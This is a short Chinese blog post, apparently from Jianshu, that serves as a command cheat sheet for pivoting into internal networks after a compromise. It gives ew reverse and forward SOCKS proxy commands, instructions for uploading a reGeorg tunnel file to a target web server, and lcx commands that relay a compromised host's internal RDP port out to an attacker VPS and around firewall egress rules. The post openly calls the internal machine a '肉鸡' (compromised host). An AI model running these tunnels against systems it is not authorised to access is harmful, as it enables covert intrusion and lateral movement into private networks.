端口转发和流量代理 ew lcx proxifier

流量代理之ew

1、ew反向代理(内网机器无公网ip需要反弹到公网,需要在vps监听)
vps服务端执行:
./ew_for_linux64 -s rcsocks -l 1080 -e 1024
内网机器执行:
ew_for_Win.exe -s rssocks -d vps的ip -e 1024
使用方式:sock5代理访问的1080端口

2、正向代理(肉鸡既有内网ip又有公网ip,直接建立正向代理进入内网,无需vps)
内网机器执行:
ew_for_Win.exe -s ssocksd -l 1080
使用方式:sock5代理访问内网机器的外网ip的1080端口

流量代理之reGeorg

1、下载git clone https://github.com/sensepost/reGeorg.git
2、reGeorg是以php文件形式转发流量,所以把tunnel.nosocket.php上传到目标web机器
3、vps执行以下命令创建一个sock代理
python reGeorgSocksProxy.py -p 8080 -u http://upload.xxxx.net:8080/tunnel/tunnel.jsp
4、使用方式:sock5代理访问的8080端口

端口转发之lcx

内网机器执行:
1、转发
lcx.exe -slave vps的ip 1111 192.168.1.133 3389
把内网机器的3389转发到外网vps的1111
公网vps执行:
lcx.exe -listen 1111 2222
1111端口做接受端,然后转发到2222端口,RDP连接2222端口等效于RDP连接内网3389

2、端口映射
内网3389的流量被防火墙拦住,不让出去,此时要内网3389映射到本机其他可以出去的端口,比如3333
lcx.exe -tran 3333 192.168.1.133 3389

参考链接:

https://xz.aliyun.com/t/6966

©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • 内网渗透-代理篇
    前言 最近参与内网渗透比较多,认知到自己在会话维持上过于依赖web服务,web服务一旦关闭,便失去了唯一的入口点。...
    Tide_诺言阅读 4,602评论 2 31
  • SSH进行端口转发
    大前提,windows可以使用freesshd做ssh服务器当一级代理,但是它的端口转发功能有bug,所以还是用l...
    jjf012阅读 4,723评论 0 0
  • 使用SSH反向代理和端口转发
    一 为什么使用SSH代理? 我们访问局域网内的主机时,一般的做法是将要访问的服务的端口映射到防火墙(公网IP)上的...
    麦卡鲁阅读 19,966评论 0 1
  • 2018年一月复盘 35
    早几天就看到群里有好几位姐妹,都写了一月份复盘,其实那个时候我也很心动,但那几天事情都很多,我无法静下心来梳...
    旷谷幽兰一阅读 264评论 5 3
  • 讨论|我们为什么爱呆在图书馆?
    说起我在学校图书馆看过的书籍,感觉挺杂的,我常去社科类的那个楼层。印象里这个楼层的书架里有心理类,职场类,经济类,...
    书亭子阅读 709评论 11 2